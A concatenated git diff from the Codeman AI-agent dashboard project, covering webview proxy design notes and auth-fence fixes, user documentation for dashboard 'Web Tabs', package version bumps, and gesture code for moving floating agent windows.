||||
- `innerHTML` / `outerHTML` / `insertAdjacentHTML` (and `ShadowRoot.innerHTML`),
|
||||
- `setAttribute` / `setAttributeNS`,
|
||||
- the `src`/`srcset`/`href`/`poster`/`data`/`action` property setters on img,
|
||||
source, media, video poster, script, iframe, embed, track, link, anchor, area,
|
||||
object and form,
|
||||
- a `MutationObserver` as a last net for any sink not patched above (it costs one
|
||||
wasted 404 per node, since the browser starts fetching on insert, so it is a net
|
||||
and not the mechanism).
|
||||
|
||||
Two details that mattered:
|
||||
|
||||
- Every rewrite routes through the existing idempotent `rw()` rather than a blind
|
||||
prefix concat. The first draft used the server-side regex shape and
|
||||
double-prefixed markup that was already proxied (a page re-injecting its own
|
||||
`outerHTML`); the jsdom test caught it.
|
||||
- Everything stays inside `try`/`catch` and is marked `__cmrw`, so a double
|
||||
injection cannot wrap an already-wrapped setter, and nothing can throw into a
|
||||
page we do not control.
|
||||
|
||||
### Verification
|
||||
|
||||
- `test/webview-proxy.test.ts` gained a jsdom `runtimeUrlShim DOM sinks` block:
|
||||
innerHTML, insertAdjacentHTML, property setters, setAttribute, srcset candidate
|
||||
lists, the MutationObserver net via an unpatched sink
|
||||
(`createContextualFragment`), idempotence, re-injected markup, empty `src`, and
|
||||
the pass-throughs (relative, cross-origin, `#hash`, `data:`). 73 tests pass.
|
||||
- End-to-end in a real browser against an isolated instance
|
||||
(`CODEMAN_INSTANCE=wvtest`, port 3151), with prod's old build as the negative
|
||||
control:
|
||||
|
||||
| | before (prod, old build) | after (fixed) |
|
||||
| --- | --- | --- |
|
||||
| images found | 693 | 693 |
|
||||
| src under the proxy prefix | 0 | 693 |
|
||||
| in-viewport images decoded | 0 / 23 | 23 / 23 |
|
||||
| sample src | `/api/hero?slug=...` | `/webview/<cap>/api/hero?slug=...` |
|
||||
|
||||
(The dashboard marks thumbs `loading="lazy"`, so only in-viewport images are
|
||||
ever fetched. All 27 proxied image responses returned 200.)
|
||||
|
||||
---
|
||||
|
||||
## Follow-up (same day): the `/api` referer fallback, done safely
|
||||
|
||||
Originally deferred, then implemented on request. Both gates had to move, and the
|
||||
auth one is the security-sensitive half: auth runs in `onRequest`, before routing,
|
||||
so it cannot tell a real Codeman API route from a 404, and simply dropping the
|
||||
`/api` fence would let a page holding a capability forge a `Referer` and reach
|
||||
Codeman's **real** API unauthenticated.
|
||||
|
||||
What shipped:
|
||||
|
||||
- `server.ts`: `tryWebviewRefererFallback` is tried **before** the API-shaped 404.
|
||||
Reaching that handler already proves no route matched, and the relay declines
|
||||
unless the `Referer` carries a live capability, so unknown `/api` paths still
|
||||
get the envelope.
|
||||
- `middleware/auth.ts`: the `/api/` prefix refusal is replaced by
|
||||
`matchesRegisteredRoute()`, which refuses the exemption for any path that
|
||||
resolves to a real route. `/ws/` and `/q/` stay refused by prefix.
|
||||
|
||||
Two findings that decided the implementation, both established by probing Fastify
|
||||
rather than by reading its docs:
|
||||
|
||||
- **`hasRoute()` is the wrong tool and would have been a hole.** It matches the
|
||||
registered PATTERN literally, so `hasRoute({url: '/api/sessions/abc'})` returns
|
||||
false against a registered `/api/sessions/:id` and would have handed out an
|
||||
exemption on a live, session-scoped API route. `findRoute()` performs the real
|
||||
radix-tree lookup and is what the fence uses.
|
||||
- **`@fastify/static` is mounted at `/`, so it registers a root catch-all that
|
||||
matches every path.** A match on it means "heading for the 404 handler", not
|
||||
"real route", and it is distinguishable because a root catch-all is the only
|
||||
route whose `*` param comes back equal to the whole request path. Without that
|
||||
carve-out the fence would have refused every referer-form request and broken the
|
||||
rescue that already worked.
|
||||
|
||||
The fence fails closed, and `test/webview-auth-exemption.test.ts` pins both edges
|
||||
(a concrete URL onto a parametric API route stays 401; the dashboard's own
|
||||
`/api/...` namespace is served).
|
||||
|
||||
### And the CSS gap, which the fallback could NOT close
|
||||
|
||||
Testing the fallback against a purpose-built upstream showed the runtime-injected
|
||||
stylesheet case is unreachable by any relay: a `<style>` element has no URL of its
|
||||
own, so Chromium sends an **empty `Referer`** with the image request it triggers
|
||||
and there is nothing to key on. Measured directly:
|
||||
|
||||
| sink | Referer the browser sends | fixed by |
|
||||
| --- | --- | --- |
|
||||
| `url()` in a proxied `.css` | the stylesheet's proxied URL | the referer relay |
|
||||
| `url()` in a runtime `<style>` | *empty* | `rwCss()` in the shim |
|
||||
|
||||
So the shim also rewrites `url()` inside `<style>` blocks, both when they arrive as
|
||||
markup and when a `<style>` node is inserted (via the existing MutationObserver).
|
||||
|
||||
The only gap left is self-navigation via `location.href = '/x'`, which cannot be
|
||||
patched because `Location.href` is unforgeable.
|
||||
@@ -0,0 +1,179 @@
|
||||
# Web Tabs (dashboards as Codeman tabs)
|
||||
|
||||
Open any dashboard you run, Grafana, Uptime Kuma, Portainer, a status page on port
|
||||
4000, as a tab beside your Claude/Codex/Antigravity sessions. Codeman becomes one mission
|
||||
control instead of Codeman plus a pile of browser tabs.
|
||||
|
||||
## Using it
|
||||
|
||||
1. Click the chevron next to **Run** to expand the dropdown.
|
||||
2. Under **Web / URL**, pick **Add dashboard...**
|
||||
3. Give it a name and a URL, optionally hit **Test**, then **Save**.
|
||||
|
||||
The dashboard opens as a tab immediately, and appears in the Run dropdown from then
|
||||
on. Web tabs sit in the same strip as session tabs, continue the same `Alt+1..9`
|
||||
numbering, and carry a globe icon so they never read as a running agent.
|
||||
|
||||
Closing a tab (the `x`) only closes it. The saved dashboard stays in the dropdown.
|
||||
To delete it for good, use the `x` on its **dropdown row** (the tab's own `x` is
|
||||
close, not delete). Each dropdown row also has a gear for editing, so a saved URL
|
||||
can be changed or removed without opening it first.
|
||||
|
||||
Switching tabs does **not** reload a dashboard. Frames stay alive in the background,
|
||||
so a dashboard that took a while to authenticate is still there when you come back.
|
||||
Past six live frames the least-recently-viewed one is dropped to bound memory
|
||||
(`CODEMAN_MAX_LIVE_WEBVIEW_FRAMES`).
|
||||
|
||||
## Why dashboards are proxied
|
||||
|
||||
A plain `<iframe src="http://your-box:4000">` does not work in the setup Codeman
|
||||
actually ships in, for three separate reasons:
|
||||
|
||||
| Blocker | What happens |
|
||||
| ------------------- | ---------------------------------------------------------------------------------------------- |
|
||||
| **Mixed content** | Production serves HTTPS (behind `tailscale serve`). Browsers hard-block `http://` iframes on an HTTPS page, with no override, and none at all on iOS Safari. |
|
||||
| **Framing refusal** | Grafana, Portainer, Home Assistant and many others send `X-Frame-Options: DENY` or `frame-ancestors 'none'`. |
|
||||
| **Codeman's CSP** | `default-src 'self'` means `frame-src` falls back to `'self'`, so a cross-origin iframe is blocked before it starts. |
|
||||
|
||||
Serving the dashboard **through Codeman's own origin** dissolves all three. So by
|
||||
default a web tab loads `/webview/<capability>/` on Codeman, and Codeman relays to
|
||||
the dashboard: stripping the framing refusal, rewriting redirects, cookies and
|
||||
root-absolute URLs, and relaying WebSockets so live panels actually update.
|
||||
|
||||
A useful consequence: the dashboard is fetched **from the Codeman server**, so a
|
||||
tailnet-only or `localhost`-only dashboard works from any device that can reach
|
||||
Codeman, including a phone that is not on the tailnet.
|
||||
|
||||
`direct` mode (a plain cross-origin iframe) still exists and is cheaper, but it only
|
||||
works for an HTTPS dashboard that permits framing. The **Test** button probes from
|
||||
the server and tells you which mode applies. Note what Test actually verifies:
|
||||
**server-to-upstream reachability, nothing else**. It does not exercise the browser
|
||||
sandbox, cookies, CORS, CSP, or any reverse proxy sitting in front of Codeman, so a
|
||||
passing Test does not guarantee the embedded page will render (see the
|
||||
cookie-authenticated reverse proxy caveat below).
|
||||
|
||||
## The sandbox, and when to turn it off
|
||||
|
||||
Because a proxied dashboard is served from Codeman's own address, it is
|
||||
*same-origin with Codeman* as far as the browser is concerned. Left unchecked, its
|
||||
JavaScript could read the Codeman page and call the API that spawns agents.
|
||||
|
||||
So the iframe is sandboxed **without** `allow-same-origin` by default. The page runs
|
||||
in an opaque origin: it cannot touch Codeman, and it gets no cookies or
|
||||
`localStorage` of its own.
|
||||
|
||||
Unchecking **Open sandboxed** grants `allow-same-origin`. Do that only for a
|
||||
dashboard you fully trust, and only if you need it, which in practice means a
|
||||
dashboard with its own login that stores a session in a cookie or `localStorage`.
|
||||
|
||||
Even in trusted mode, Codeman never forwards its own credentials upstream: the
|
||||
`Authorization` header and the `codeman_session` cookie are stripped on the way out,
|
||||
so `CODEMAN_PASSWORD` cannot leak into a dashboard.
|
||||
|
||||
⚠️ **Sandboxed tabs may not work when Codeman itself is behind a
|
||||
cookie-authenticated reverse proxy** (Cloudflare Access, Authelia, oauth2-proxy and
|
||||
similar). The sandboxed frame is opaque-origin, so its stylesheet, script, and API
|
||||
requests do not carry the proxy's authentication cookie; the proxy redirects them to
|
||||
the login provider, where CORS/CSP kills them, and the embedded app renders
|
||||
unstyled or broken while the Codeman page around it works fine. Trusted mode
|
||||
(**Open sandboxed** off) keeps a real origin and the cookie, so it works. The
|
||||
**Test** button cannot catch this: it checks that the Codeman *server* can reach the
|
||||
upstream, not that a sandboxed *browser* frame can load assets through the public
|
||||
authentication layer.
|
||||
|
||||
## How the proxy authenticates
|
||||
|
||||
A sandboxed iframe is opaque-origin, so every request it makes is cross-site: the
|
||||
`SameSite=lax` session cookie is not sent, and writes and WebSocket upgrades arrive
|
||||
with `Origin: null`. Cookie auth cannot work.
|
||||
|
||||
Instead, opening a dashboard mints a **capability**: 192 bits of entropy in the URL
|
||||
path, held in memory only, with a rolling 12-hour TTL, bound to the user who minted
|
||||
it, and granting exactly one thing, relaying bytes to that one saved URL. Editing or
|
||||
deleting a dashboard revokes it, and a server restart invalidates every outstanding
|
||||
capability (tabs re-mint transparently on next click).
|
||||
|
||||
## Limits and env vars
|
||||
|
||||
| Variable | Default | Meaning |
|
||||
| ------------------------------------ | ------- | ------------------------------------------ |
|
||||
| `CODEMAN_MAX_WEBVIEWS` | 50 | Saved dashboards per owner |
|
||||
| `CODEMAN_MAX_LIVE_WEBVIEW_FRAMES` | 6 | Iframes kept mounted at once |
|
||||
| `CODEMAN_WEBVIEW_CAPABILITY_TTL_MS` | 12h | Rolling capability lifetime |
|
||||
| `CODEMAN_WEBVIEW_TIMEOUT_MS` | 30000 | Upstream request timeout |
|
||||
| `CODEMAN_WEBVIEW_PROBE_TIMEOUT_MS` | 8000 | Timeout for the Test button |
|
||||
| `CODEMAN_MAX_WEBVIEW_HTML_BYTES` | 8MB | Largest HTML document rewritten |
|
||||
| `CODEMAN_MAX_WEBVIEW_SOCKETS` | 8 | Concurrent proxied WebSockets per dashboard |
|
||||
|
||||
Saved dashboards live in `~/.codeman/webviews.json`. Which tabs you have open is
|
||||
per-device (`localStorage`), since that is workspace layout rather than config.
|
||||
|
||||
## How a dashboard's own API calls keep working
|
||||
|
||||
Worth knowing, because it is where this feature does its least obvious work. Three
|
||||
layers cooperate so a dashboard talking to its own backend just works:
|
||||
|
||||
1. `<base href>` handles relative URLs in the markup.
|
||||
2. Attribute rewriting handles root-absolute `src`/`href`/`action` in the page the
|
||||
proxy serves.
|
||||
3. A small injected script rebases URLs built at **runtime**, which the first two
|
||||
cannot see: `fetch('/api/data')` and `new WebSocket('/live')`, but equally
|
||||
`card.innerHTML = '<img src="/api/hero">'`, `img.src = '/api/slide'`, and
|
||||
`url(/img.png)` inside a `<style>` the page injects. That second group is why
|
||||
images are covered too. A dashboard that renders its thumbnails from script
|
||||
would otherwise show all its data and none of its pictures, because `<base>`
|
||||
does not apply to root-absolute URLs and the attribute rewriting only ever saw
|
||||
the initial document.
|
||||
4. As a last resort, a request that still lands on Codeman's own root is relayed
|
||||
using its `Referer` to identify the dashboard. This only fires for a request
|
||||
that already missed every Codeman route, and never for one that resolves to a
|
||||
real route, which is what keeps it from being an authentication bypass.
|
||||
|
||||
On top of that, the proxy answers those requests with CORS headers. That sounds
|
||||
wrong for same-host requests, but a sandboxed iframe has an *opaque* origin, so the
|
||||
browser treats every one of its `fetch`/XHR calls as cross-origin even though the
|
||||
URL is on Codeman itself. Without those headers, a dashboard renders perfectly and
|
||||
then every API call fails, which looks like the dashboard being broken.
|
||||
|
||||
## Known limits
|
||||
|
||||
- **Exotic loaders.** The layers above cover normal `fetch`/XHR/WebSocket/
|
||||
EventSource, normal markup, the DOM sinks a page uses to build markup at runtime,
|
||||
and `url()` inside stylesheets. Something that constructs requests by an unusual
|
||||
route can still slip through. Symptom: the page renders but a panel stays empty.
|
||||
- **Root-absolute `location` navigation.** A dashboard that navigates itself with
|
||||
`location.href = '/login'` escapes the prefix, because `Location.href` is
|
||||
unforgeable and cannot be patched the way the other sinks are. A relative
|
||||
`location.href = 'login'` is fine (`<base>` covers it).
|
||||
- **Cross-origin redirects are not followed.** If a dashboard bounces to a different
|
||||
host (an external SSO provider, say), the proxy hands the redirect back unchanged
|
||||
rather than relaying it, because relaying would make this an open proxy. Use
|
||||
**Open in new tab** for those.
|
||||
- **Login-protected dashboards need trusted mode**, since a sandboxed frame has no
|
||||
cookie jar. A server-side per-dashboard cookie jar would lift this and is the
|
||||
natural next step if it becomes annoying.
|
||||
- **Cookie-authenticated reverse proxies in front of Codeman break sandboxed tabs**
|
||||
(#238). The sandboxed frame's requests carry no auth cookie, so the proxy bounces
|
||||
them to its login provider and the app loads broken while Test reports reachable.
|
||||
Use trusted mode behind Cloudflare Access and friends; see the warning above.
|
||||
- **Slow endpoints and the upstream timeout** (#237). The proxy waits
|
||||
`CODEMAN_WEBVIEW_TIMEOUT_MS` (default 300s) for the upstream's response *headers*,
|
||||
then streams the body without any time bound; a header timeout is logged
|
||||
server-side and answered as a 502 that names the limit. WebSocket handshakes use
|
||||
the separate `CODEMAN_WEBVIEW_WS_HANDSHAKE_TIMEOUT_MS` (default 30s).
|
||||
- **Not a security boundary.** The proxy reaches whatever the Codeman server can
|
||||
reach. That is not an escalation for someone who already commands
|
||||
`--dangerously-skip-permissions` agents, but in multi-user mode it does mean a
|
||||
non-admin user's dashboard is fetched from the server's network position.
|
||||
|
||||
## Where the code lives
|
||||
|
||||
| Concern | File |
|
||||
| ------------------------ | --------------------------------------- |
|
||||
| Pure rewrite helpers | `src/web/webview-proxy.ts` |
|
||||
| Routes + proxy + sockets | `src/web/routes/webview-routes.ts` |
|
||||
| Capability tokens | `src/webview-capabilities.ts` |
|
||||
| Persistence | `src/webview-store.ts` |
|
||||
| Limits | `src/config/webview-limits.ts` |
|
||||
| Frontend | `src/web/public/webview-tabs.js` |
|
||||
| Auth exemption | `src/web/middleware/auth.ts` |
|
||||
@@ -1,12 +1,12 @@
|
||||
{
|
||||
"name": "aicodeman",
|
||||
"version": "1.1.2",
|
||||
"version": "1.16.6",
|
||||
"lockfileVersion": 3,
|
||||
"requires": true,
|
||||
"packages": {
|
||||
"": {
|
||||
"name": "aicodeman",
|
||||
"version": "1.1.2",
|
||||
"version": "1.16.6",
|
||||
"hasInstallScript": true,
|
||||
"license": "MIT",
|
||||
"workspaces": [
|
||||
@@ -28,10 +28,13 @@
|
||||
"chokidar": "^3.6.0",
|
||||
"commander": "^12.1.0",
|
||||
"fastify": "^5.8.5",
|
||||
"heic-decode": "^2.1.0",
|
||||
"jpeg-js": "^0.4.4",
|
||||
"node-pty": "^1.1.0",
|
||||
"qrcode": "^1.5.4",
|
||||
"uuid": "^14.0.0",
|
||||
"web-push": "^3.6.7",
|
||||
"ws": "^8.21.0",
|
||||
"zod": "^4.3.6"
|
||||
},
|
||||
"bin": {
|
||||
@@ -4544,6 +4547,16 @@
|
||||
"integrity": "sha512-b3fMOsyLVuCeNJWxolACEUED0vm7qC0cy4wRvf3oURSzDTYVQiGPhTnhWZwIHdvC48Y+oLhvYXnY4XDXPoJo6A==",
|
||||
"license": "MIT"
|
||||
},
|
||||
"node_modules/@xterm/headless": {
|
||||
"version": "6.0.0",
|
||||
"resolved": "https://registry.npmjs.org/@xterm/headless/-/headless-6.0.0.tgz",
|
||||
"integrity": "sha512-5Yj1QINYCyzrZtf8OFIHi47iQtI+0qYFPHmouEfG8dHNxbZ9Tb9YGSuLcsEwj9Z+OL75GJqPyJbyoFer80a2Hw==",
|
||||
"dev": true,
|
||||
"license": "MIT",
|
||||
"workspaces": [
|
||||
"addons/*"
|
||||
]
|
||||
},
|
||||
"node_modules/@xterm/xterm": {
|
||||
"version": "6.0.0",
|
||||
"resolved": "https://registry.npmjs.org/@xterm/xterm/-/xterm-6.0.0.tgz",
|
||||
@@ -7023,6 +7036,18 @@
|
||||
"node": ">= 0.4"
|
||||
}
|
||||
},
|
||||
"node_modules/heic-decode": {
|
||||
"version": "2.1.0",
|
||||
"resolved": "https://registry.npmjs.org/heic-decode/-/heic-decode-2.1.0.tgz",
|
||||
"integrity": "sha512-0fB3O3WMk38+PScbHLVp66jcNhsZ/ErtQ6u2lMYu/YxXgbBtl+oKOhGQHa4RpvE68k8IzbWkABzHnyAIjR758A==",
|
||||
"license": "ISC",
|
||||
"dependencies": {
|
||||
"libheif-js": "^1.19.8"
|
||||
},
|
||||
"engines": {
|
||||
"node": ">=8.0.0"
|
||||
}
|
||||
},
|
||||
"node_modules/html-encoding-sniffer": {
|
||||
"version": "4.0.0",
|
||||
"resolved": "https://registry.npmjs.org/html-encoding-sniffer/-/html-encoding-sniffer-4.0.0.tgz",
|
||||
@@ -7481,6 +7506,12 @@
|
||||
"node": ">=10"
|
||||
}
|
||||
},
|
||||
"node_modules/jpeg-js": {
|
||||
"version": "0.4.4",
|
||||
"resolved": "https://registry.npmjs.org/jpeg-js/-/jpeg-js-0.4.4.tgz",
|
||||
"integrity": "sha512-WZzeDOEtTOBK4Mdsar0IqEU5sMr3vSV2RqkAIzUEV2BHnUfKGyswWFPFwK5EeDo93K3FohSHbLAjj0s1Wzd+dg==",
|
||||
"license": "BSD-3-Clause"
|
||||
},
|
||||
"node_modules/js-tokens": {
|
||||
"version": "10.0.0",
|
||||
"resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-10.0.0.tgz",
|
||||
@@ -7664,6 +7695,15 @@
|
||||
"node": ">= 0.8.0"
|
||||
}
|
||||
},
|
||||
"node_modules/libheif-js": {
|
||||
"version": "1.19.8",
|
||||
"resolved": "https://registry.npmjs.org/libheif-js/-/libheif-js-1.19.8.tgz",
|
||||
"integrity": "sha512-vQJWusIxO7wavpON1dusciL8Go9jsIQ+EUrckauFYAiSTjcmLAsuJh3SszLpvkwPci3JcL41ek2n+LUZGFpPIQ==",
|
||||
"license": "LGPL-3.0",
|
||||
"engines": {
|
||||
"node": ">=8.0.0"
|
||||
}
|
||||
},
|
||||
"node_modules/light-my-request": {
|
||||
"version": "6.6.0",
|
||||
"resolved": "https://registry.npmjs.org/light-my-request/-/light-my-request-6.6.0.tgz",
|
||||
@@ -12303,9 +12343,10 @@
|
||||
}
|
||||
},
|
||||
"packages/xterm-zerolag-input": {
|
||||
"version": "0.1.4",
|
||||
"version": "0.3.0",
|
||||
"license": "MIT",
|
||||
"devDependencies": {
|
||||
"@xterm/headless": "^6.0.0",
|
||||
"jsdom": "^24.1.3",
|
||||
"tsup": "^8.5.1",
|
||||
"typescript": "^5.5.0",
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
{
|
||||
"name": "aicodeman",
|
||||
"version": "1.1.2",
|
||||
"version": "1.16.6",
|
||||
"description": "Mission control for AI coding agents - run 20 autonomous agents with real-time monitoring and session persistence",
|
||||
"type": "module",
|
||||
"main": "dist/index.js",
|
||||
@@ -21,7 +21,10 @@
|
||||
"test:watch": "vitest --config config/vitest.config.ts",
|
||||
"test:coverage": "vitest run --config config/vitest.config.ts --coverage",
|
||||
"test:ci": "vitest run --config config/vitest.ci.config.ts",
|
||||
"pretest:mobile": "node scripts/prepare-test-vendor.mjs",
|
||||
"test:mobile": "vitest run --config test/mobile/vitest.config.ts",
|
||||
"check:frontend-syntax": "node scripts/check-frontend-syntax.mjs",
|
||||
"fix:node-pty": "node scripts/fix-node-pty.mjs",
|
||||
"typecheck": "tsc --noEmit",
|
||||
"lint": "eslint --config config/eslint.config.js 'src/**/*.ts'",
|
||||
"lint:fix": "eslint --config config/eslint.config.js 'src/**/*.ts' --fix",
|
||||
@@ -32,25 +35,45 @@
|
||||
"changeset": "changeset",
|
||||
"version-packages": "changeset version && npm install --package-lock-only && node scripts/check-lockfile-sync.mjs",
|
||||
"check:lockfile": "node scripts/check-lockfile-sync.mjs",
|
||||
"knip": "npx --yes knip@latest",
|
||||
"knip": "npx --yes knip@latest --config config/knip.json",
|
||||
"release": "changeset publish"
|
||||
},
|
||||
"prettier": {
|
||||
"singleQuote": true,
|
||||
"semi": true,
|
||||
"tabWidth": 2,
|
||||
"printWidth": 120,
|
||||
"trailingComma": "es5",
|
||||
"endOfLine": "lf"
|
||||
},
|
||||
"workspaces": [
|
||||
".",
|
||||
"packages/*"
|
||||
],
|
||||
"keywords": [
|
||||
"claude",
|
||||
"claude-code",
|
||||
"claude-ai",
|
||||
"claude",
|
||||
"anthropic",
|
||||
"ai-agent",
|
||||
"automation",
|
||||
"opencode",
|
||||
"codex",
|
||||
"antigravity",
|
||||
"gemini-cli",
|
||||
"ai-agents",
|
||||
"agent",
|
||||
"session-manager",
|
||||
"self-hosted",
|
||||
"developer-tools",
|
||||
"tmux",
|
||||
"terminal",
|
||||
"xterm",
|
||||
"docker",
|
||||
"mosh",
|
||||
"local-echo",
|
||||
"web-dashboard",
|
||||
"cli",
|
||||
"llm",
|
||||
"autonomous-agent",
|
||||
"ralph-loop"
|
||||
"automation"
|
||||
],
|
||||
"author": "arkon",
|
||||
"license": "MIT",
|
||||
@@ -69,10 +92,13 @@
|
||||
"chokidar": "^3.6.0",
|
||||
"commander": "^12.1.0",
|
||||
"fastify": "^5.8.5",
|
||||
"heic-decode": "^2.1.0",
|
||||
"jpeg-js": "^0.4.4",
|
||||
"node-pty": "^1.1.0",
|
||||
"qrcode": "^1.5.4",
|
||||
"uuid": "^14.0.0",
|
||||
"web-push": "^3.6.7",
|
||||
"ws": "^8.21.0",
|
||||
"zod": "^4.3.6"
|
||||
},
|
||||
"devDependencies": {
|
||||
@@ -134,6 +160,8 @@
|
||||
"files": [
|
||||
"dist",
|
||||
"scripts/postinstall.js",
|
||||
"scripts/fix-node-pty.mjs",
|
||||
"skills",
|
||||
"LICENSE",
|
||||
"README.md"
|
||||
]
|
||||
|
||||
@@ -17,6 +17,13 @@
|
||||
// • Panel "re-grab" — pinch an existing floating panel and move it anywhere;
|
||||
// release over the tab strip to re-dock it (panel goes away, the tab stays).
|
||||
// This is the capability the old OS-window detach lost.
|
||||
// • Agent-window "grab-to-move" — pinch any floating *subagent* or *ultracode*
|
||||
// run/transcript window (the dashboard's own `.subagent-window` /
|
||||
// `.ultracode-window` floats) and move it anywhere. These windows stay owned
|
||||
// by app.js — we only nudge their `style.left/top` and ask app.js to redraw
|
||||
// the glowing connector line back to their session tab (its redraw reads live
|
||||
// rects, so the line tracks without us touching app.js internals). This is the
|
||||
// multi-monitor verb that lets these windows cross the physical monitor seam.
|
||||
// • Button "tap" — pinch over a toolbar button (Run / Run Shell) and release
|
||||
// in place → fires the button's real click handler. Drift too far first and
|
||||
// it's treated as a stray move, not a tap.
|
||||
@@ -36,12 +43,29 @@ import type { HandState } from '../gesture/types.ts';
|
||||
declare global {
|
||||
interface Window {
|
||||
__codemanGesture?: GestureBridge;
|
||||
/** The Codeman dashboard singleton (app.js, `window.app`). The gesture layer
|
||||
* reaches into it to redraw the floating-window connector lines and bump a
|
||||
* grabbed window's z-order while moving the subagent / ultracode windows.
|
||||
* Loosely typed — only the few members we touch. */
|
||||
app?: {
|
||||
updateConnectionLines?: () => void;
|
||||
saveSubagentWindowStates?: () => void;
|
||||
subagentWindowZIndex?: number;
|
||||
ultracodeWindowZIndex?: number;
|
||||
};
|
||||
}
|
||||
}
|
||||
|
||||
const TAB_SELECTOR = '.session-tab';
|
||||
/** An in-page floating session panel this layer spawned — re-grabbable to move. */
|
||||
const PANEL_SELECTOR = '.cg-float';
|
||||
/** The dashboard's own floating agent windows (subagent runs + ultracode run and
|
||||
* transcript windows). All three carry one of these classes, position via
|
||||
* `style.left/top`, and redraw their connector line from
|
||||
* `window.app.updateConnectionLines()` — so the hand can pick one up and move it
|
||||
* without app.js knowing. (`.ultracode-agent-window` also carries
|
||||
* `.ultracode-window`, so this matches it too.) */
|
||||
const WINDOW_SELECTOR = '.subagent-window, .ultracode-window';
|
||||
/** The session-tab strip; dropping a moved panel over it re-docks the session. */
|
||||
const DOCK_SELECTOR = '.session-tabs';
|
||||
/** Toolbar buttons a pinch can "tap": Run (#runBtn → app.run()) and Run Shell
|
||||
@@ -93,6 +117,17 @@ type Grab =
|
||||
dy: number;
|
||||
/** Cursor currently over the tab strip → releasing re-docks. */
|
||||
overDock: boolean;
|
||||
}
|
||||
| {
|
||||
/** A dashboard-owned floating agent window (subagent / ultracode) being
|
||||
* moved. We never remove or re-parent it — just reposition + redraw its
|
||||
* connector. The element ref can go stale mid-grab (SSE reconnect tears
|
||||
* ultracode windows down), so every move guards on `el.isConnected`. */
|
||||
kind: 'window';
|
||||
el: HTMLElement;
|
||||
/** Cursor→window-top-left offset at grab, so it doesn't snap. */
|
||||
dx: number;
|
||||
dy: number;
|
||||
};
|
||||
|
||||
/** Live state for one hand pinching a toolbar button (Run / Run Shell). */
|
||||
@@ -122,6 +157,8 @@ class GestureBridge {
|
||||
private taps = new Map<string, Tap>();
|
||||
/** Live floating panels, keyed by session id (idempotent per id). */
|
||||
private floats = new Map<string, FloatingPanel>();
|
||||
/** rAF coalescing for connector-line redraws while dragging an agent window. */
|
||||
private connectorRedrawScheduled = false;
|
||||
|
||||
constructor() {
|
||||
injectStyles();
|
||||
@@ -187,7 +224,7 @@ class GestureBridge {
|
||||
await this.gc.start();
|
||||
this.running = true;
|
||||
this.button.classList.add('on');
|
||||
this.status.textContent = 'on — pinch a tab or button';
|
||||
this.status.textContent = 'on — pinch a tab, window, or button';
|
||||
} catch (err) {
|
||||
// Surface the *real* cause: MediaPipe/Emscripten can throw a non-Error
|
||||
// (number/string), so `(err as Error).message` was logging "undefined".
|
||||
@@ -242,6 +279,22 @@ class GestureBridge {
|
||||
}
|
||||
}
|
||||
|
||||
// A dashboard-owned floating agent window (subagent / ultracode run or
|
||||
// transcript) → pick it up and move it. Priority below cg-float panels
|
||||
// (which sit far above), above tabs/buttons. We grab anywhere on the window
|
||||
// (not just its titlebar) since the hand is choosing the whole window.
|
||||
const win = this.hitClosest(x, y, WINDOW_SELECTOR);
|
||||
if (win) {
|
||||
const rect = win.getBoundingClientRect();
|
||||
// Match app.js's own drag: drop any bottom-anchor so left/top take effect.
|
||||
win.style.bottom = 'auto';
|
||||
win.classList.add('cg-win-grabbed');
|
||||
this.bringWindowToFront(win);
|
||||
this.grabs.set(hand, { kind: 'window', el: win, dx: x - rect.left, dy: y - rect.top });
|
||||
this.status.textContent = 'moving window';
|
||||
return;
|
||||
}
|
||||
|
||||
// A session tab → grab-and-pull-out into a floating panel (ghost follows).
|
||||
const tab = this.hitClosest(x, y, TAB_SELECTOR);
|
||||
const id = tab?.dataset.id;
|
||||
@@ -292,12 +345,16 @@ class GestureBridge {
|
||||
}
|
||||
return;
|
||||
}
|
||||
if (grab?.kind === 'window') {
|
||||
this.moveWindow(grab.el, x - grab.dx, y - grab.dy);
|
||||
return;
|
||||
}
|
||||
// A button pinch that drifts too far is a stray move, not a tap — cancel it.
|
||||
const tap = this.taps.get(hand);
|
||||
if (tap && Math.hypot(x - tap.ox, y - tap.oy) > TAP_CANCEL_PX) {
|
||||
tap.el.classList.remove('cg-tap-armed');
|
||||
this.taps.delete(hand);
|
||||
this.status.textContent = 'on — pinch a tab or button';
|
||||
this.status.textContent = 'on — pinch a tab, window, or button';
|
||||
}
|
||||
}
|
||||
|
||||
@@ -319,6 +376,23 @@ class GestureBridge {
|
||||
else this.flash('placed');
|
||||
return;
|
||||
}
|
||||
if (grab?.kind === 'window') {
|
||||
this.grabs.delete(hand);
|
||||
grab.el.classList.remove('cg-win-grabbed');
|
||||
// Clear the coalescer so the final placement always redraws, even if a
|
||||
// mid-drag rAF was throttled (tab briefly backgrounded) and left it latched.
|
||||
this.connectorRedrawScheduled = false;
|
||||
this.redrawWindowConnectors();
|
||||
// Persist subagent-window positions like app.js's own drag end does
|
||||
// (a no-op for ultracode windows, which aren't position-persisted).
|
||||
try {
|
||||
window.app?.saveSubagentWindowStates?.();
|
||||
} catch {
|
||||
/* best-effort */
|
||||
}
|
||||
this.flash('placed window');
|
||||
return;
|
||||
}
|
||||
// Release over the same button → fire its real click handler.
|
||||
const tap = this.taps.get(hand);
|
||||
if (tap) {
|
||||
@@ -373,6 +447,59 @@ class GestureBridge {
|
||||
float.el.style.top = `${t}px`;
|
||||
}
|
||||
|
||||
/** Move a dashboard-owned agent window by its top-left, clamped on-screen, then
|
||||
* redraw its connector line. The window self-positions via `style.left/top` and
|
||||
* app.js's connector redraw reads live rects, so this tracks without touching
|
||||
* app.js internals. Guards on `isConnected`: ultracode windows can be torn down
|
||||
* (SSE reconnect / auto-close) while still held. Clamps to `innerWidth/Height`,
|
||||
* which equals the *spanned* viewport in a multi-monitor window — so the window
|
||||
* can still travel across the physical monitor seam, just not off-screen. */
|
||||
private moveWindow(el: HTMLElement, left: number, top: number): void {
|
||||
if (!el.isConnected) return;
|
||||
const w = el.offsetWidth || 380;
|
||||
const h = el.offsetHeight || 320;
|
||||
const l = Math.min(Math.max(4, left), Math.max(4, window.innerWidth - w - 4));
|
||||
const t = Math.min(Math.max(4, top), Math.max(4, window.innerHeight - h - 4));
|
||||
el.style.left = `${l}px`;
|
||||
el.style.top = `${t}px`;
|
||||
this.redrawWindowConnectors();
|
||||
}
|
||||
|
||||
/** Ask app.js to redraw all connector lines (subagent + ultracode), coalesced to
|
||||
